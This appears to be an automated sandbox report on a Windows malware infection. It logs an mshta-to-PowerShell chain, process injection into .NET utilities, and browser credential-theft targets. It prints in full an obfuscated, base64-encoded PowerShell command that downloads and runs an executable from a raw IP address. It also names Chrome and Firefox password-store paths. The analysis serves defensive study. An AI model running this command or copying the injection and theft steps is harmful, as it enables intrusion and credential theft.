            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 25_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,25_2_0040BB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 25_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,25_2_0040BD37
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 25_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,25_2_00407C97
            Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 11_2_000000013FDE26B0 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,11_2_000000013FDE26B0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: winiti.exe, 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp, winiti.exe, 0000000B.00000000.447217263.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp, winiti.exe, 0000000B.00000002.451807346.0000000143000000.00000004.00001000.00020000.00000000.sdmp, winiti.exe, 00000016.00000002.484524464.0000000142800000.00000004.00001000.00020000.00000000.sdmp, winiti.exe, 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp, winiti.exe, 00000016.00000000.481803220.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp, winiti.exe.7.dr, csrss[1].exe.7.dr Binary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 25_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_004349F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 25_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,25_2_0041CB50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 25_2_004432B5 mov eax, dword ptr fs:[00000030h]25_2_004432B5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 25_2_00412077 GetProcessHeap,HeapFree,25_2_00412077
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 11_2_000000013FDD5760 RtlAddVectoredExceptionHandler,11_2_000000013FDD5760
            Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 11_2_000000013FE39A88 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_000000013FE39A88
            Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 22_2_000000013F5F5760 RtlAddVectoredExceptionHandler,22_2_000000013F5F5760
            Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 22_2_000000013F659A88 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_000000013F659A88
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 25_2_00434B47 SetUnhandledExceptionFilter,25_2_00434B47
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 25_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_004349F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 25_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_0043BB22
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 25_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,25_2_00434FDC

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 401000
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 459000
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 471000
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 477000
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 478000
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 479000
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 47E000
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7EFDE008
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 459000
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 471000
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 477000
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 478000
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 479000
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 47E000
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 459000
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 471000
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 477000
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 478000
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 479000
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47E000
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 7EFDE008
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 25_2_004120F7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 25_2_00419627 mouse_event,25_2_00419627
            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC41B.tmp" "c:\Users\user\AppData\Local\Temp\ofvwqfjd\CSC42CCF8E8871B428699CAD148D9BC26FF.TMP"
            Source: C:\Users\user\AppData\Roaming\winiti.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC9F.tmp" "c:\Users\user\AppData\Local\Temp\ge3s1wmx\CSCB36078EA61014130AC1261969F8319D.TMP"
            Source: C:\Users\user\AppData\Roaming\winiti.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
            Source: C:\Users\user\AppData\Roaming\winiti.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jdf6sudoc3cgicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicbhzeqtdflwrsagicagicagicagicagicagicagicagicagicagicatbuvnymvyzgvmau5jvelvbiagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbw9uiiwgicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicbytvh2evrsvnfglhn0cmluzyagicagicagicagicagicagicagicagicagicagicbvlhn0cmluzyagicagicagicagicagicagicagicagicagicagicbqq2csdwludcagicagicagicagicagicagicagicagicagicagicbrrnzhwhffdgdoleludfb0ciagicagicagicagicagicagicagicagicagicagicbieck7jyagicagicagicagicagicagicagicagicagicagicattkfnrsagicagicagicagicagicagicagicagicagicagicaizgiiicagicagicagicagicagicagicagicagicagicagic1oqw1lu3bhy2ugicagicagicagicagicagicagicagicagicagicageufqvfb0ccagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicqxeklhtnn3ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3my4xndmundyvvdi1mddgl2nzcnnzlmv4zsisiirfbny6qvbqrefuqvx3aw5pdgkuzxhliiwwldapo1n0qxjulxnmzuvwkdmpo3nuqvjuicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcd2luaxrplmv4zsi='+[char]34+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jdf6sudoc3cgicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicbhzeqtdflwrsagicagicagicagicagicagicagicagicagicagicatbuvnymvyzgvmau5jvelvbiagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbw9uiiwgicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicbytvh2evrsvnfglhn0cmluzyagicagicagicagicagicagicagicagicagicagicbvlhn0cmluzyagicagicagicagicagicagicagicagicagicagicbqq2csdwludcagicagicagicagicagicagicagicagicagicagicbrrnzhwhffdgdoleludfb0ciagicagicagicagicagicagicagicagicagicagicbieck7jyagicagicagicagicagicagicagicagicagicagicattkfnrsagicagicagicagicagicagicagicagicagicagicaizgiiicagicagicagicagicagicagicagicagicagicagic1oqw1lu3bhy2ugicagicagicagicagicagicagicagicagicagicageufqvfb0ccagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicqxeklhtnn3ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3my4xndmundyvvdi1mddgl2nzcnnzlmv4zsisiirfbny6qvbqrefuqvx3aw5pdgkuzxhliiwwldapo1n0qxjulxnmzuvwkdmpo3nuqvjuicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcd2luaxrplmv4zsi='+[char]34+'))')))"
            Source: InstallUtil.exe, 0000000D.00000002.843116352.00000000007B5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
            Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 11_2_000000013FDD5410 cpuid 11_2_000000013FDD5410
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: EnumSystemLocalesW,25_2_00452036
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,25_2_004520C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetLocaleInfoW,25_2_00452313
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: EnumSystemLocalesW,25_2_00448404
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,25_2_0045243C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetLocaleInfoW,25_2_00452543
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,25_2_00452610
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetLocaleInfoA,25_2_0040F8D1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetLocaleInfoW,25_2_004488ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: IsValidCodePage,GetLocaleInfoW,25_2_00451CD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: EnumSystemLocalesW,25_2_00451F50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: EnumSystemLocalesW,25_2_00451F9B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 11_2_000000013FDDDF20 GetSystemTimeAsFileTime,11_2_000000013FDDDF20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 25_2_0041B60D GetUserNameW,25_2_0041B60D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 25_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,25_2_00449190
            Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match File source: 25.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 22.2.winiti.exe.143564228.3.unpack, type: UNPACKEDPE
            Source: Yara match File source: 11.2.winiti.exe.143fc3ae0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 22.2.winiti.exe.1437c3ae0.1.unpack, type: UNPACKEDPE
            Source: Yara match File source: 25.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 11.2.winiti.exe.143fc3ae0.2.unpack, type: UNPACKEDPE
            Source: Yara match File source: 22.2.winiti.exe.1437c3ae0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 11.2.winiti.exe.143d64228.3.unpack, type: UNPACKEDPE
            Source: Yara match File source: 22.2.winiti.exe.143564228.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 11.2.winiti.exe.143d64228.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000019.00000002.484511050.0000000000835000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000B.00000002.451807346.0000000143D64000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000016.00000002.484524464.0000000143564000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000D.00000002.843116352.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: winiti.exe PID: 3608, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 3660, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: winiti.exe PID: 4076, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: AddInProcess32.exe PID: 2480, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 25_2_0040BA12
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 25_2_0040BB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: \key3.db 25_2_0040BB30

            Remote Access Functionality

            Source: Yara match File source: 25.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 22.2.winiti.exe.143564228.3.unpack, type: UNPACKEDPE
